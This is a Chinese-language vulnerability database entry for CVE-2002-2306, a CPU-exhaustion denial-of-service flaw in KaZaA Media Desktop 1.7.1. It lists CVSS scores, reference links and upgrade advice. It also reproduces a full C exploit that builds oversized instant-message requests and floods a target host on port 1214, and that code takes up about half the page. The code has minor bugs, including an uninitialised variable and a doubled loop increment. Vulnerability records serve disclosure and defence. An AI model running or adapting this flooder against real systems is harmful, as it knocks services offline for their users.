CVE-2002-2306
CVSS7.8
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:52
NMCOE    

[原文]Sharman Networks KaZaA Media Desktop 1.7.1 allows remote attackers to cause a denial of service (CPU consumption) by sending several large messages.


[CNNVD]KaZaA Media Desktop Large Message服务拒绝漏洞(CNNVD-200212-311)

        Sharman Networks KaZaA Media Desktop 1.7.1版本存在漏洞。远程攻击者通过发送一些超大消息导致服务拒绝(CPU消耗)。

- CVSS (基础分值)

CVSS分值: 7.8 [严重(HIGH)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-399 [资源管理错误]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2306
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2306
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-311
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5317
(PATCH)  BID  5317
http://xforce.iss.net/xforce/xfdb/9672
(UNKNOWN)  XF  kazaa-large-msg-dos(9672)

- 漏洞信息

KaZaA Media Desktop Large Message服务拒绝漏洞
高危 其他
2002-12-31 00:00:00 2002-12-31 00:00:00
远程  
        Sharman Networks KaZaA Media Desktop 1.7.1版本存在漏洞。远程攻击者通过发送一些超大消息导致服务拒绝(CPU消耗)。

- 公告与补丁

        An updated version is available:
        Sharman Networks KaZaA Media Desktop 1.7.1
        

- 漏洞信息 (21653)

KaZaA Media Desktop 1.7.1 Large Message Denial Of Service Vulnerability (EDBID:21653)
windows remote
2002-07-25 Verified
0 Josh and omega
N/A [点击下载]
source: http://www.securityfocus.com/bid/5317/info

KaZaA may consume large amounts of CPU when processing a sequence of large messages. It is possible for an attacker to flood a vulnerable system with a large number of messages, resulting in a denial of service condition.

/*
   kazaa denial of service attack
   by Josh and omega
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdarg.h>

#define PORT 1214


int main(int argc, char *argv[])
{
   int fd, numbytes, randnum, k;
   struct hostent *host;
   struct sockaddr_in them;
   char buf2[4026];
   char buf[5000];
   char *bigboy;
   int i, size, j;


   memset(buf2, 'a', sizeof(buf2));
   buf2[sizeof(buf2)-1]='\0';
   srand(time(NULL));

   if (argc < 5)
   {
      fprintf(stderr,"usage: %s <hostname> <(this*4026) bytes per message> <username_of_target> <number_of_messages>\n", argv[0]);
      exit(1);
   }
   if ((host=gethostbyname(argv[1])) == NULL)
   {
      perror("gethostbyname");
      exit(1);
   }

   them.sin_family = AF_INET;
   them.sin_port = htons(PORT);
   them.sin_addr = *((struct in_addr *)host->h_addr);
   memset(&(them.sin_zero), '\0', 8);


   size=(4042*atoi(argv[2]))+280+1;
   bigboy=(char *)malloc(size);

   snprintf(bigboy, size, "GET /.message HTTP/1.1\nHost: 68.10.112.148:1214\nUserAgent: KazaaClient Jan 18 2002 18:53:21\nX-Kazaa-Username: 31337h4x0r\nX-Kazaa-Network: KaZaA\nX-Kazaa-IP: %d:1214\nX-Kazaa-SupernodeIP: %d:1214\nConnection:  open\nX-Kazaa-IMTo: %s@KaZaA\nX-Kazaa-IMType: user_text\n", randnum, randnum, argv[3]);

   /* the msg appears as one msg to the receiver, but comes in intervals of 4096 bytes... */
   snprintf(buf, sizeof(buf), "X-Kazaa-IMData: %s\n", buf2);
   for(k=0;k<atoi(argv[2]);k++)
   {
      strcat(bigboy, buf);
      k++;
   }
   strcat(bigboy, "\r\n\r\n\r\n\r\n\r\n");

   fprintf(stdout, "done preparing packet... sending\n");
   for(i=0, k=0;i<atoi(argv[4]);i++)
   {
     if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
     {
       perror("socket");
     }
     else
     {
       if (connect(fd, (struct sockaddr *)&them,sizeof(struct sockaddr)) == -1)
       {
         perror("connect");
       }
       else
       {
         printf("sending %d message\n", k);
         write(fd, bigboy, strlen(bigboy));
         k++;
         close(fd);
       }
     }
   }
   fprintf(stdout, "\n%d out of %d attempted got through\n", k, i);
   free(bigboy);
   return 0;
}		

- 漏洞信息

59567
KaZaA Media Desktop Message Saturation Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Vendor Verified

- 漏洞描述

KaZaA Media Desktop contains a flaw that may allow a remote denial of service. The issue is triggered when a remote attacker sends several large messages causing 100 percent CPU consumption, and will result in loss of availability for the platform.

- 时间线

2002-07-25 Unknow
2002-07-25 Unknow

- 解决方案

Upgrade to version 1.7.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站